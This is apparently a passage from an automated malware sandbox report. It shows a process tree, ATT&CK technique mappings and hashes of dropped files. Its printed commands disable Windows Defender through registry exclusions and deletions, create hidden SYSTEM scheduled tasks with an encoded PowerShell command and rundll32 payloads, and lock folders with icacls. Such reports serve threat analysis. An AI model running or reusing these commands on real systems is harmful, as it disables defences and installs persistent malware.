\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3028 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7116
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:7108
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:6704
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:6556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:6560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:6336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:6588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:6664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:7156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:6660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:6156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:5572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:5720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:7064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:6880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:7060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:2712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:3420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:3352
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwMKBreSR" /SC once /ST 00:59:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
PID:6388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwMKBreSR"2⤵PID:6212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwMKBreSR"2⤵PID:6284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 05:30:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\ZQqYSYc.exe\" Ty /yKsite_idZvb 385118 /S" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mRaseIvrfxDtBOYKW"2⤵PID:2132
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3504
-
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:780
-
C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exeC:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe1⤵
- Executes dropped EXE
PID:3744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6004 -ip 60041⤵PID:5204
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:2992
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2152
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:6236
-
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\ZQqYSYc.exeC:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\ZQqYSYc.exe Ty /yKsite_idZvb 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"2⤵PID:5296
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:5744
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:6040
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4568
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\tQZLna.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\turCmMd.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:5504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eGwAoTnpAObQfPU"2⤵PID:6252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eGwAoTnpAObQfPU"2⤵PID:3544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\BxqUtce.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:3948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\JLTzLJm.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:5772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\wptboXB.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:6104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\bYFLPDi.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:4440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 04:57:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\RajEPzgz\HQQuYEm.dll\",#1 /Dfsite_idSTG 385118" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4448 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6704
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FTXCzbcEvROqagNdd"2⤵PID:7108
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:5716
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:6212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4896
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:7012
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"2⤵PID:2536
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\RajEPzgz\HQQuYEm.dll",#1 /Dfsite_idSTG 3851181⤵PID:6608
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\RajEPzgz\HQQuYEm.dll",#1 /Dfsite_idSTG 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3448 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"3⤵PID:6816
-
-
-
C:\Users\Admin\AppData\Local\Temp\6558.exeC:\Users\Admin\AppData\Local\Temp\6558.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5688 -
C:\Users\Admin\AppData\Local\Temp\6558.exeC:\Users\Admin\AppData\Local\Temp\6558.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:3936 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\13321316-cf0e-4435-9812-5e7fd2442ecd" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:6984
-
-
C:\Users\Admin\AppData\Local\Temp\6558.exe"C:\Users\Admin\AppData\Local\Temp\6558.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\6558.exe"C:\Users\Admin\AppData\Local\Temp\6558.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
PID:2732 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 5685⤵
- Program crash
PID:1348
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2732 -ip 27321⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6488
-
C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exeC:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe1⤵
- Executes dropped EXE
PID:1548
-
C:\Users\Admin\AppData\Local\Temp\8054.exeC:\Users\Admin\AppData\Local\Temp\8054.exe1⤵
- Executes dropped EXE
PID:6344
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1024KB
MD569bc30aa65dd38cdc68eaea0e84fa865
SHA12a151cbfc25eaccb486ed796f87a6d4c9b469793
SHA256b6748f79c3f7564593f36a4a5ec3315463d6482481b1403f287720ac21466b0a
SHA512c460532cce80f165bf544b3c76d2f4a557898c519e1f38638eea57ceababd88511c1a16df6c8d6e4e94e3879127e488391f643fff57d12e0cd5a5a93005f4575
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
1.6MB
MD59119fdc161ff0fdb317d45a860266e73
SHA1374d373aad6b7b26973dda18baa5b2c8dd47adb9
SHA256b7131e87e473b81aad27a30484bd2dad18d27997d15928998451724981595f0e
SHA5129693a2351def3fe5dc117ec7128e451e63eef56c08d17fdf6ed50b5134771e20b08b891efa3e6e055023979e4f37f9e6c7501e2127c177413229093a3fafa53f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5ee58d2c95bb1e8467cd1cb8ecddca733
SHA1ad543c33d77885628a4d2a71c1920a40bb2eda74
SHA256e3c1bac42000aae5e0e09dede353178cfe71496e35335dbf52c295715b281647
SHA5123e8dac84793cb8892a9d3bb48f1c4e2e0fdb9bb07d066b150399bbe505602c003338f79a1df7f9a89e3499ddfe82d5a8861795fbf6658b3ff7dcf7896bd63270
-
Filesize
34KB
MD5000ad97f210e4d820aea04610e33d6a4
SHA1afc9c5d515b73c17da0dc95941c3a869d89a7d1e
SHA2566d0326caaf48e57b65cba3d8be2caeca9c3469e1a84fd456b6f5f9f35de47576
SHA512d1b1671706ddde9a105193087d7fce0055cd3d0f976d9ed8dc5fec633279d014c9d53f05efbbe38442343634bb2a5b590aa1ba71e053a513dff2e6123ecb01d2
-
Filesize
3KB
MD5fe3aab3ae544a134b68e881b82b70169
SHA1926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6
SHA256bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b
SHA5123fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD500fc3761b2ec5fcedff893b668a7aa5d
SHA14d3798853d74e85a02b1efb78c989d506efa9e8a
SHA256abb0599266bc878f9a1a8fb18b873502f32f403d8e3cfe994775a1e58396070e
SHA5123fff6b0469f4c28205ee11190818262d86b18aeb0a9572bacb97ca42b4ccf1a80f1287bde11361f726e3fd0193556443c653bd170ba3f420596dfd1d50facd03
-
Filesize
1KB
MD574cd4674166ac8f1bea0a81b6bb8eabc
SHA10e7e9faee65e22e86a0f47664f3489c12e710d90
SHA256430d083ba64e6ecf668e892360b5a4a3423ff492e84f01f14aa69957de2e1e44
SHA512ce07207402aefa1503da21c5cc29e55f777abd5a04b2b41061c6d6a37da7ec3a2df0388c7481bf0c71e4f656cb703ca19c6ecde9cbe5ae21d2948321ee7d7391
-
Filesize
1.5MB
MD58d455236dc3bc52c5fa5ed8b3353402c
SHA1eb5a4282b8313fedc71d9470d4acbdf8151cf859
SHA25603fda08ec369cf756867cc3cf5cb86e0e0bf30256ed4184e5f399d08f71d4df5
SHA51268d9d6eec1bfb2fe3254f38c17f4493b4a8029edba634b37662e4dd5a9c9f08378931cfd4c6d316ce24bc1e39a020830a9374ad702e1f1f5953776d0e768c778
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250745161\additional_file0.tmp
Filesize2.5MB
MD520d293b9bf23403179ca48086ba88867
SHA1dedf311108f607a387d486d812514a2defbd1b9e
SHA256fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA5125d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250745161\opera_package
Filesize15.8MB
MD5e2c581ccea4ec60ec6382c494b3a9182
SHA1fa85799db7a3e4d531ae64f5ac50bdc2b66c3dc6
SHA256cbf5025f2784ef7a2e033485de94305c85800848bc4d0bd3239b1ff342d6c38a
SHA512c76bca7dfdbb56bfd17b9977be1d8db9c65969edaa930610db3b54b49774f275aa0f0e164b7c1ae89a44f00845c48cb89b6c4b01fc555f5ac6890802d20990d5
-
Filesize
1.8MB
MD57ce37ff1e89c1fc09e26a921b321828c
SHA12aa177a9179e204092b4d242b0e521f1e04c1b7d
SHA256bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33
SHA5125ab44ae449329edbf9851c182a035f25ed0f34cdcd2165588bd8cd9d7c5cfcfdc348c7578c347e3b2cf05b6f259321c5a3e650dd85466bfa589dd1861339eab8
-
Filesize
3.0MB
MD570a853de51fff863cd5f2813a0cec054
SHA1b85c0de47f726380a12722ef4c16c14919ac61fc
SHA256c184747eb3ef1bae441893f5436751f5c4e859b17c551d083dcaffd3ec5630cd
SHA5126112a5e988eb7a0a8e64fe3ecda97bd78a533bb68d601c62a2452b8e1c6810c0e485bfb709086fecc35907600f8a4a66d34956c19ae29d6cedc82a0950a7681b
-
Filesize
413KB
MD5d467222c3bd563cb72fa49302f80b079
SHA19335e2a36abb8309d8a2075faf78d66b968b2a91
SHA256fedb08b3ec7034a15e9dee7ed4dec1a854fb78e74285e1ee05c90f9e9e4f8b3e
SHA512484b6c427e28193ddb73dd7062e2bfbd132ddc72ce4811bfe08784669de30e4b92bc27140373f62a4ce651401000a3c505188620c43da410bf6b0799a0791fa7
-
Filesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
Filesize
3.4MB
MD5cc0940c21b90ed055ddc4bf9e8657a36
SHA1522f6054869b772da74de0fc4e0dd52e3aa0ef8e
SHA25609715ad5df976dd59ef6e12ccf7dd715cd81067a3b96ee3a2e4a50a9d476b31e
SHA51297f83288ab044e668077d97bd214c1675c7f55cc269ddb77adea4307ab9eb0fc7f6d75ee2dc6b43c242a95f52e57b502ff8b17beaff99f3025c741f8e366190a
-
Filesize
1.4MB
MD501bb789177fef26502da93a3872eb8be
SHA17c9f7f771b4059127bca1aae19f0b992989ff0ed
SHA25615cd90736a926b67980ace0a0aa1e54c6e24017ff95b46bc4475eaa2d406c360
SHA512bc11f8e4e5a16150663bfb0a0d0ef2cfa40384068b55cce222ad97f9d719473528bea15ffa0959fda6eef9945b5803a3eaffed52f16397a91b6a794c0e9bd349
-
Filesize
1.8MB
MD54d6c608435da1f14de06e7e76e3a2c6c
SHA1e45fc1d82c26c93c11d123fe7b9d8e3ff968da25
SHA25685bc5402d10882d7f4088a48d672a89dc446677c9e9a14ce86cca5884b6983a2
SHA51283959c334b170d39cfa9565e59ef1162613faabd2abc3710ca4a9f06ea85a3fd4a7d6164a5f37233e8ce77a4ec3dd68c0364e949b72d22b97dae948e6f0903e7
-
Filesize
1.4MB
MD5c2412d52cc868538bc13840dfa8b784b
SHA1bf8780d87a5cb0ad23fda7b92328423120ee54fd
SHA2563299bd829bd33d0e4b11df3d0a0fa1e3a4e90c077766459bc436841b77d8b092
SHA512ba10e7329dd71d9b35f06bc53143e85ec5551363743b0121cbfe4967227846b1466fb1653e7975b8129ebf123bccbe393c7fcc7b145c7f2138f48e3bf4bbc61f
-
Filesize
443KB
MD5eeecb2b258c39d3af4d16c2f56f5d82d
SHA164c04f51dc4614e812bd41e166bdd4c540d84df9
SHA25660a5b8100e41afd1b8fae148a0fea360173742ca63ff383469e4facf54d03634
SHA512169ecebc66dbd55dc12297483fdc93b65c54de70df6d21b1b0b2bedfb079d6319dbd67f8f26da15f63a9afec4d5d0ca818aece7a1942ad0c5b9439c07fde1a2d
-
Filesize
294KB
MD55700c54d51e14d0ce00bbbb6015baed2
SHA171eb9361a9d6b35317fc8a385b748a8a6ce3bee7
SHA256583d73f0111e0aeed0a34fa4fc4ba85875a11f88ac93f9bacb59359aaf5b94e2
SHA5129dddd66cf82aead6400a19e81ccd0ebc0f5e312bc5772937e1929820a1db0fb74cf1480ef3bb9e9c70aefa25ce02c8c7d9f1a17bff6eb2137d76247a61eb2b9d
-
Filesize
2.8MB
MD5d1380cae37236d30402a9feb7a553937
